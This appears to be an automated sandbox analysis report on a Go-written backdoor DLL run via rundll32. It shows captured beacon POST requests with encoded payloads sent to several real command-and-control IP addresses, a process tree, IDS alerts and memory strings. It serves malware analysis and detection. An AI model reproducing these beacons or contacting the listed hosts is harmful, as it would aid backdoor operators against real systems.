Jul 16, 2024 09:57:23.920691013 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: exAiJ4u0 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.7	49779	91.142.74.28	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:57:25.673943043 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: UZpWmQI4 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.7	49780	77.238.224.56	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:57:27.434370041 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: IQnUOmAY Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.7	49781	77.238.229.63	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:57:29.069286108 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: cY57xGeW Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.7	49782	77.238.250.123	80

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:57:31.678011894 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: rGJtOhgj Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:57:32.308358908 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:57:32 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Statistics

Click to jump to process

Memory Usage

• loaddll32.exe
• conhost.exe
• cmd.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe

Click to jump to process

High Level Behavior Distribution

• File
• Network

Click to dive into process behavior distribution

Behavior

• loaddll32.exe
• conhost.exe
• cmd.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe

Click to jump to process

Target ID:	0
Start time:	03:53:21
Start date:	16/07/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\file.dll"
Imagebase:	0x2e0000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:53:21
Start date:	16/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	03:53:21
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:53:21
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc
Imagebase:	0xff0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:53:22
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Imagebase:	0xff0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	03:53:25
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export
Imagebase:	0xff0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:53:31
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc
Imagebase:	0xff0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	03:53:31
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export
Imagebase:	0xff0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Source: Traffic	Snort IDS: 2855539 ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M2 91.142.73.198:30865 -> 192.168.2.7:49711
Source: Traffic	Snort IDS: 2855536 ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M1 192.168.2.7:49711 -> 91.142.73.198:30865
Source: Traffic	Snort IDS: 2855537 ETPRO TROJAN Unknown Golang Backdoor CnC Client Request M2 192.168.2.7:49711 -> 91.142.73.198:30865
Source: Traffic	Snort IDS: 2855538 ETPRO TROJAN Unknown Golang Backdoor CnC Server Response M1 91.142.73.198:30865 -> 192.168.2.7:49711

Source: rundll32.exe, 00000004.00000002.3683289274.000000006C11B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000005.00000002.3684633751.000000006C11B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000006.00000002.1265554159.000000006C11B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 0000000F.00000002.3684240445.000000006C11B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht
Source: rundll32.exe, 00000010.00000002.1350960158.000000006C11B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTabortedCopySidFreeSidSleepExWSARecvWSASendsignal refused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetestht

Source: Joe Sandbox View	IP Address: 91.142.74.28 91.142.74.28
Source: Joe Sandbox View	IP Address: 77.238.229.63 77.238.229.63
Source: Joe Sandbox View	IP Address: 195.2.70.38 195.2.70.38

